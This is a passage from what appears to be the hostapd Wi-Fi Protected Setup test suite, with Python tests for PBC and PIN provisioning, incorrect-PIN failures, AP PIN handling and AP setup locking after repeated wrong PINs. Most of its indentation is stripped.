if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
sta = hapd.get_sta(dev[0].p2p_interface_addr())
if 'wpsDeviceName' not in sta or sta['wpsDeviceName'] != "Device A":
raise Exception("Device name not available in STA command")
def test_ap_wps_conf_5ghz(dev, apdev):
"""WPS PBC provisioning with configured AP on 5 GHz band"""
try:
hapd = None
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"country_code": "FI", "hw_mode": "a", "channel": "36" }
hapd = hostapd.add_ap(apdev[0], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="5180")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
sta = hapd.get_sta(dev[0].p2p_interface_addr())
if 'wpsDeviceName' not in sta or sta['wpsDeviceName'] != "Device A":
raise Exception("Device name not available in STA command")
finally:
dev[0].request("DISCONNECT")
if hapd:
hapd.request("DISABLE")
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
def test_ap_wps_conf_chan14(dev, apdev):
"""WPS PBC provisioning with configured AP on channel 14"""
try:
hapd = None
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"country_code": "JP", "hw_mode": "b", "channel": "14" }
hapd = hostapd.add_ap(apdev[0], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].request("WPS_PBC")
dev[0].wait_connected(timeout=30)
sta = hapd.get_sta(dev[0].p2p_interface_addr())
if 'wpsDeviceName' not in sta or sta['wpsDeviceName'] != "Device A":
raise Exception("Device name not available in STA command")
finally:
dev[0].request("DISCONNECT")
if hapd:
hapd.request("DISABLE")
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_twice(dev, apdev):
"""WPS provisioning with twice to change passphrase"""
ssid = "test-wps-twice"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" }
hapd = hostapd.add_ap(apdev[0], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
dev[0].request("DISCONNECT")
logger.info("Restart AP with different passphrase and re-run WPS")
hostapd.remove_bss(apdev[0])
params['wpa_passphrase'] = 'another passphrase'
hapd = hostapd.add_ap(apdev[0], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
networks = dev[0].list_networks()
if len(networks) > 1:
raise Exception("Unexpected duplicated network block present")
@remote_compatible
def test_ap_wps_incorrect_pin(dev, apdev):
"""WPS PIN provisioning with incorrect PIN"""
ssid = "test-wps-incorrect-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning attempt 1")
hapd.request("WPS_PIN any 12345670")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s 55554444" % apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-FAIL"], timeout=30)
if ev is None:
raise Exception("WPS operation timed out")
if "config_error=18" not in ev:
raise Exception("Incorrect config_error reported")
if "msg=8" not in ev:
raise Exception("PIN error detected on incorrect message")
dev[0].wait_disconnected(timeout=10)
dev[0].request("WPS_CANCEL")
# if a scan was in progress, wait for it to complete before trying WPS again
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
status = hapd.request("WPS_GET_STATUS")
if "Last WPS result: Failed" not in status:
raise Exception("WPS failure result not shown correctly")
logger.info("WPS provisioning attempt 2")
hapd.request("WPS_PIN any 12345670")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s 12344444" % apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-FAIL"], timeout=30)
if ev is None:
raise Exception("WPS operation timed out")
if "config_error=18" not in ev:
raise Exception("Incorrect config_error reported")
if "msg=10" not in ev:
raise Exception("PIN error detected on incorrect message")
dev[0].wait_disconnected(timeout=10)
@remote_compatible
def test_ap_wps_conf_pin(dev, apdev):
"""WPS PIN provisioning with configured AP"""
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not cleared")
logger.info("Try to connect from another station using the same PIN")
pin = dev[1].request("WPS_PIN " + apdev[0]['bssid'])
ev = dev[1].wait_event(["WPS-M2D","CTRL-EVENT-CONNECTED"], timeout=30)
if ev is None:
raise Exception("Operation timed out")
if "WPS-M2D" not in ev:
raise Exception("Unexpected WPS operation started")
hapd.request("WPS_PIN any " + pin)
dev[1].wait_connected(timeout=30)
def test_ap_wps_conf_pin_mixed_mode(dev, apdev):
"""WPS PIN provisioning with configured AP (WPA+WPA2)"""
ssid = "test-wps-conf-pin-mixed"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "3",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wpa_pairwise": "TKIP" })
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP' or status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected encryption/key_mgmt configuration: pairwise=%s group=%s key_mgmt=%s" % (status['pairwise_cipher'], status['group_cipher'], status['key_mgmt']))
logger.info("WPS provisioning step (auth_types=0x1b)")
if "OK" not in dev[0].request("SET wps_force_auth_types 0x1b"):
raise Exception("Failed to set wps_force_auth_types 0x1b")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP' or status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected encryption/key_mgmt configuration: pairwise=%s group=%s key_mgmt=%s" % (status['pairwise_cipher'], status['group_cipher'], status['key_mgmt']))
logger.info("WPS provisioning step (auth_types=0 encr_types=0)")
if "OK" not in dev[0].request("SET wps_force_auth_types 0"):
raise Exception("Failed to set wps_force_auth_types 0")
if "OK" not in dev[0].request("SET wps_force_encr_types 0"):
raise Exception("Failed to set wps_force_encr_types 0")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP' or status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected encryption/key_mgmt configuration: pairwise=%s group=%s key_mgmt=%s" % (status['pairwise_cipher'], status['group_cipher'], status['key_mgmt']))
dev[0].request("SET wps_force_auth_types ")
dev[0].request("SET wps_force_encr_types ")
@remote_compatible
def test_ap_wps_conf_pin_v1(dev, apdev):
"""WPS PIN provisioning with configured WPS v1.0 AP"""
ssid = "test-wps-conf-pin-v1"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("SET wps_version_number 0x10")
hapd.request("WPS_PIN any " + pin)
found = False
for i in range(0, 10):
dev[0].scan(freq="2412")
if "[WPS-PIN]" in dev[0].request("SCAN_RESULTS"):
found = True
break
if not found:
hapd.request("SET wps_version_number 0x20")
raise Exception("WPS-PIN flag not seen in scan results")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
hapd.request("SET wps_version_number 0x20")
@remote_compatible
def test_ap_wps_conf_pin_2sta(dev, apdev):
"""Two stations trying to use WPS PIN at the same time"""
ssid = "test-wps-conf-pin2"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
pin = "12345670"
pin2 = "55554444"
hapd.request("WPS_PIN " + dev[0].get_status_field("uuid") + " " + pin)
hapd.request("WPS_PIN " + dev[1].get_status_field("uuid") + " " + pin)
dev[0].dump_monitor()
dev[1].dump_monitor()
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
dev[1].wait_connected(timeout=30)
@remote_compatible
def test_ap_wps_conf_pin_timeout(dev, apdev):
"""WPS PIN provisioning with configured AP timing out PIN"""
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
addr = dev[0].p2p_interface_addr()
pin = dev[0].wps_read_pin()
if "FAIL" not in hapd.request("WPS_PIN "):
raise Exception("Unexpected success on invalid WPS_PIN")
hapd.request("WPS_PIN any " + pin + " 1")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
time.sleep(1.1)
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["WPS-PIN-NEEDED"], timeout=20)
if ev is None:
raise Exception("WPS-PIN-NEEDED event timed out")
ev = dev[0].wait_event(["WPS-M2D"])
if ev is None:
raise Exception("M2D not reported")
dev[0].request("WPS_CANCEL")
hapd.request("WPS_PIN any " + pin + " 20 " + addr)
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
def test_ap_wps_reg_connect(dev, apdev):
"""WPS registrar using AP PIN to connect"""
ssid = "test-wps-reg-ap-pin"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin})
logger.info("WPS provisioning step")
dev[0].dump_monitor()
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
def test_ap_wps_reg_connect_zero_len_ap_pin(dev, apdev):
"""hostapd with zero length ap_pin parameter"""
ssid = "test-wps-reg-ap-pin"
appin = ""
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin})
logger.info("WPS provisioning step")
dev[0].dump_monitor()
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin, no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("No WPS-FAIL reported")
if "msg=5 config_error=15" not in ev:
raise Exception("Unexpected WPS-FAIL: " + ev)
def test_ap_wps_reg_connect_mixed_mode(dev, apdev):
"""WPS registrar using AP PIN to connect (WPA+WPA2)"""
ssid = "test-wps-reg-ap-pin"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "3",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wpa_pairwise": "TKIP", "ap_pin": appin})
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
def test_ap_wps_reg_override_ap_settings(dev, apdev):
"""WPS registrar and ap_settings override"""
ap_settings = "/tmp/ap_wps_reg_override_ap_settings"
try:
os.remove(ap_settings)
except OSError:
pass
# Override AP Settings with values that point to another AP
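# (build_wsc_attr, defined elsewhere in this file, presumably packs each WSC
# attribute as a TLV: 16-bit attribute type, 16-bit length, then the value.)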
data = build_wsc_attr(ATTR_NETWORK_INDEX, b'\x01')
data += build_wsc_attr(ATTR_SSID, b"test")
data += build_wsc_attr(ATTR_AUTH_TYPE, b'\x00\x01')
data += build_wsc_attr(ATTR_ENCR_TYPE, b'\x00\x01')
data += build_wsc_attr(ATTR_NETWORK_KEY, b'')
data += build_wsc_attr(ATTR_MAC_ADDR, binascii.unhexlify(apdev[1]['bssid'].replace(':', '')))
with open(ap_settings, "wb") as f:
f.write(data)
ssid = "test-wps-reg-ap-pin"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin, "ap_settings": ap_settings })
hapd2 = hostapd.add_ap(apdev[1], { "ssid": "test" })
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].scan_for_bss(apdev[1]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
ev = hapd2.wait_event(['AP-STA-CONNECTED'], timeout=10)
os.remove(ap_settings)
if ev is None:
raise Exception("No connection with the other AP")
def check_wps_reg_failure(dev, ap, appin):
dev.request("WPS_REG " + ap['bssid'] + " " + appin)
ev = dev.wait_event(["WPS-SUCCESS", "WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS operation timed out")
if "WPS-SUCCESS" in ev:
raise Exception("WPS operation succeeded unexpectedly")
if "config_error=15" not in ev:
raise Exception("WPS setup locked state was not reported correctly")
def test_ap_wps_random_ap_pin(dev, apdev):
"""WPS registrar using random AP PIN"""
ssid = "test-wps-reg-random-ap-pin"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
appin = hapd.request("WPS_AP_PIN random")
if "FAIL" in appin:
raise Exception("Could not generate random AP PIN")
if appin not in hapd.request("WPS_AP_PIN get"):
raise Exception("Could not fetch current AP PIN")
logger.info("WPS provisioning step")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
hapd.request("WPS_AP_PIN disable")
logger.info("WPS provisioning step with AP PIN disabled")
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
check_wps_reg_failure(dev[1], apdev[0], appin)
logger.info("WPS provisioning step with AP PIN reset")
appin = "12345670"
hapd.request("WPS_AP_PIN set " + appin)
dev[1].wps_reg(apdev[0]['bssid'], appin)
dev[0].request("REMOVE_NETWORK all")
dev[1].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=10)
dev[1].wait_disconnected(timeout=10)
logger.info("WPS provisioning step after AP PIN timeout")
hapd.request("WPS_AP_PIN disable")
appin = hapd.request("WPS_AP_PIN random 1")
time.sleep(1.1)
if "FAIL" not in hapd.request("WPS_AP_PIN get"):
raise Exception("AP PIN unexpectedly still enabled")
check_wps_reg_failure(dev[0], apdev[0], appin)
logger.info("WPS provisioning step after AP PIN timeout(2)")
hapd.request("WPS_AP_PIN disable")
appin = "12345670"
hapd.request("WPS_AP_PIN set " + appin + " 1")
time.sleep(1.1)
if "FAIL" not in hapd.request("WPS_AP_PIN get"):
raise Exception("AP PIN unexpectedly still enabled")
check_wps_reg_failure(dev[1], apdev[0], appin)
with fail_test(hapd, 1, "os_get_random;wps_generate_pin"):
hapd.request("WPS_AP_PIN random 1")
hapd.request("WPS_AP_PIN disable")
with alloc_fail(hapd, 1, "upnp_wps_set_ap_pin"):
hapd.request("WPS_AP_PIN set 12345670")
hapd.request("WPS_AP_PIN disable")
if "FAIL" not in hapd.request("WPS_AP_PIN set"):
raise Exception("Invalid WPS_AP_PIN accepted")
if "FAIL" not in hapd.request("WPS_AP_PIN foo"):
raise Exception("Invalid WPS_AP_PIN accepted")
def test_ap_wps_reg_config(dev, apdev):
"""WPS registrar configuring an AP using AP PIN"""
ssid = "test-wps-init-ap-pin"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"ap_pin": appin})
logger.info("WPS configuration step")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
new_ssid = "wps-new-ssid"
new_passphrase = "1234567890"
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPA2PSK", "CCMP",
new_passphrase)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != new_ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
logger.info("Re-configure back to open")
dev[0].request("REMOVE_NETWORK all")
dev[0].flush_scan_cache()
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], appin, "wps-open", "OPEN", "NONE", "")
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != "wps-open":
raise Exception("Unexpected SSID")
if status['key_mgmt'] != 'NONE':
raise Exception("Unexpected key_mgmt")
def test_ap_wps_reg_config_ext_processing(dev, apdev):
"""WPS registrar configuring an AP with external config processing"""
ssid = "test-wps-init-ap-pin"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wps_cred_processing": "1", "ap_pin": appin}
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
new_ssid = "wps-new-ssid"
new_passphrase = "1234567890"
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPA2PSK", "CCMP",
new_passphrase, no_wait=True)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS registrar operation timed out")
ev = hapd.wait_event(["WPS-NEW-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("WPS configuration timed out")
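    # The event carries a hexdump of the received AP Settings; attribute 0x1026
    # (Network Index) is expected to be present in them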
if "1026" not in ev:
raise Exception("AP Settings missing from event")
hapd.request("SET wps_cred_processing 0")
if "FAIL" in hapd.request("WPS_CONFIG " + binascii.hexlify(new_ssid.encode()).decode() + " WPA2PSK CCMP " + binascii.hexlify(new_passphrase.encode()).decode()):
raise Exception("WPS_CONFIG command failed")
dev[0].wait_connected(timeout=15)
def test_ap_wps_reg_config_tkip(dev, apdev):
"""WPS registrar configuring AP to use TKIP and AP upgrading to TKIP+CCMP"""
skip_with_fips(dev[0])
ssid = "test-wps-init-ap"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"ap_pin": appin})
logger.info("WPS configuration step")
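    # Force the station to WPS 1.0 behavior; WPS 2.0 would not allow
    # provisioning a TKIP-only configuration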
dev[0].request("SET wps_version_number 0x10")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
new_ssid = "wps-new-ssid-with-tkip"
new_passphrase = "1234567890"
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPAPSK", "TKIP",
new_passphrase)
logger.info("Re-connect to verify WPA2 mixed mode")
dev[0].request("DISCONNECT")
id = 0
dev[0].set_network(id, "pairwise", "CCMP")
dev[0].set_network(id, "proto", "RSN")
dev[0].connect_network(id)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected: wpa_state={} bssid={}".format(status['wpa_state'], status['bssid']))
if status['ssid'] != new_ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
def test_ap_wps_setup_locked(dev, apdev):
"""WPS registrar locking up AP setup on AP PIN failures"""
ssid = "test-wps-incorrect-ap-pin"
appin = "12345670"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin})
new_ssid = "wps-new-ssid-test"
new_passphrase = "1234567890"
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
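    # Run through several incorrect AP PIN attempts; after enough failures the
    # AP is expected to lock its setup (config_error=15) instead of reporting
    # the per-attempt authentication failure (config_error=18)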
    ap_setup_locked = False
for pin in ["55554444", "1234", "12345678", "00000000", "11111111"]:
dev[0].dump_monitor()
logger.info("Try incorrect AP PIN - attempt " + pin)
dev[0].wps_reg(apdev[0]['bssid'], pin, new_ssid, "WPA2PSK",
"CCMP", new_passphrase, no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout on receiving WPS operation failure event")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
if "config_error=15" in ev:
logger.info("AP Setup Locked")
            ap_setup_locked = True
elif "config_error=18" not in ev:
raise Exception("config_error=18 not reported")
dev[0].wait_disconnected(timeout=10)
time.sleep(0.1)
if not ap_setup_locked:
raise Exception("AP setup was not locked")
dev[0].request("WPS_CANCEL")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412, force_scan=True,
only_new=True)
bss = dev[0].get_bss(apdev[0]['bssid'])
if 'wps_ap_setup_locked' not in bss or bss['wps_ap_setup_locked'] != '1':
logger.info("BSS: " + str(bss))
raise Exception("AP Setup Locked not indicated in scan results")
status = hapd.request("WPS_GET_STATUS")
if "Last WPS result: Failed" not in status:
raise Exception("WPS failure result not shown correctly")
if "Peer Address: " + dev[0].p2p_interface_addr() not in status:
raise Exception("Peer address not shown correctly")
time.sleep(0.5)
dev[0].dump_monitor()
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("WPS success was not reported")
dev[0].wait_connected(timeout=30)
appin = hapd.request("WPS_AP_PIN random")
if "FAIL" in appin:
raise Exception("Could not generate random AP PIN")
ev = hapd.wait_event(["WPS-AP-SETUP-UNLOCKED"], timeout=10)
if ev is None:
raise Exception("Failed to unlock AP PIN")
def test_ap_wps_setup_locked_timeout(dev, apdev):
"""WPS re-enabling AP PIN after timeout"""
ssid = "test-wps-incorrect-ap-pin"
appin = "12345670"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin})
new_ssid = "wps-new-ssid-test"
new_passphrase = "1234567890"
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
    ap_setup_locked = False
for pin in ["55554444", "1234", "12345678", "00000000", "11111111"]:
dev[0].dump_monitor()
logger.info("Try incorrect AP PIN - attempt " + pin)
dev[0].wps_reg(apdev[0]['bssid'], pin, new_ssid, "WPA2PSK",
"CCMP", new_passphrase, no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL", "CTRL-EVENT-CONNECTED"], timeout=15)
if ev is None:
raise Exception("Timeout on receiving WPS operation failure event")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
if "config_error=15" in ev:
logger.info("AP Setup Locked")
            ap_setup_locked = True
break
elif "config_error=18" not in ev:
raise Exception("config_error=18 not reported")
dev[0].wait_disconnected(timeout=10)
time.sleep(0.1)
if not ap_setup_locked:
raise Exception("AP setup was not locked")
ev = hapd.wait_event(["WPS-AP-SETUP-UNLOCKED"], timeout=80)
if ev is None:
raise Exception("AP PIN did not get unlocked on 60 second timeout")
def test_ap_wps_setup_locked_2(dev, apdev):
"""WPS AP configured for special ap_setup_locked=2 mode"""
ssid = "test-wps-ap-pin"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin, "ap_setup_locked": "2" }
hapd = hostapd.add_ap(apdev[0], params)
new_ssid = "wps-new-ssid-test"
new_passphrase = "1234567890"
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
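    # With ap_setup_locked=2, the AP PIN can still be used to learn the current
    # AP settings, but any attempt to change the configuration is rejected with
    # the Setup Locked error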
dev[0].wps_reg(apdev[0]['bssid'], appin)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
hapd.dump_monitor()
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPA2PSK",
"CCMP", new_passphrase, no_wait=True)
ev = hapd.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("hostapd did not report WPS failure")
if "msg=12 config_error=15" not in ev:
raise Exception("Unexpected failure reason (AP): " + ev)
ev = dev[0].wait_event(["WPS-FAIL", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout on receiving WPS operation failure event")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
if "config_error=15" not in ev:
raise Exception("Unexpected failure reason (STA): " + ev)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
@remote_compatible
def test_ap_wps_pbc_overlap_2ap(dev, apdev):
"""WPS PBC session overlap with two active APs"""
params = { "ssid": "wps1", "eap_server": "1", "wps_state": "2",
